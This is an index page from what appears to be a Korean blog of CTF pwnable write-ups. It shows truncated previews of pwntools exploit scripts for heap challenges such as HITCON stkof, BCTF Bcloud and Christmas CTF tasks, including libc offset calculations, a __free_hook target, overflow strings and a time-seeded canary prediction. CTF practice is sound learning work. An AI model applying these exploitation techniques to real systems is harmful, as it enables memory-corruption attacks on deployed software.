분류 전체보기
-
hitcon 2014 stkofPwnable/CTF 2017. 9. 4. 23:47
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778from pwn import * p = process("./stkof")elf = ELF("./stkof") def malloc(size): p.sendline("1") p.sendline(str(size)) print p.recvuntil('OK') def free(index): p.sendline("3") p.sendline(str(index)) print p.recvuntil('OK') def fread(index,length,data): ..
-
크리스마스CTF 2016 house_of_daeheePwnable/CTF 2017. 8. 28. 01:45
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051from pwn import * p=process("./house_of_daehee")elf=ELF("./house_of_daehee") print p.recvuntil('heap (')A = int(p.recv(14),16)p.recv(2)B = int(p.recv(14),16)p.recv(2)C = int(p.recv(14),16) p.recvuntil('system address: ')system = int(p.recv(14),16)base = system - 0x45390free_hook = base + 0x3c67a8stdout =..
-
크리스마스CTF 2016 who is solo?Pwnable/CTF 2017. 8. 27. 04:25
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980from pwn import * p=process("./solo")elf=ELF("./solo") def malloc(number,size,data): p.recvuntil('$ ') p.sendline("1") p.recvuntil('Number: ') p.sendline(str(number)) p.recvuntil('Size: ') p.sendline(str(size)) p.recvuntil('Data: ') p.sendline(dat..
-
BCTF 2016 BcloudPwnable/CTF 2017. 8. 27. 00:38
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485from pwn import * p=process("./bcloud.9a3bd1d30276b501a51ac8931b3e43c4")#p=remote("localhost",9001)elf = ELF("./bcloud.9a3bd1d30276b501a51ac8931b3e43c4")def start(): print p.recvuntil('Input your name:') p.sendline("A"*64+"C"*64+"\xff\xf..
-
-
YISF 2017 본선Pwnable/CTF 2017. 8. 13. 23:27
pwnable custom canary challenge 문제에서 서버시간이 한국시간이라 해서 내꺼 칼리리눅스가 한글시간이라 칼리 리눅스로 문제를 풀었다. 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263from pwn import *from ctypes import CDLL#p=process("./echo")p=remote("111.111.111.77",3452)elf = ELF("./echo")libc=CDLL("libc.so.6") a = time.time()libc.srand(int(a))cookie = libc.rand()cookie_2..
-
YISF 2017 write upPwnable/CTF 2017. 8. 10. 22:58
+PWN YISF 200 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164..
-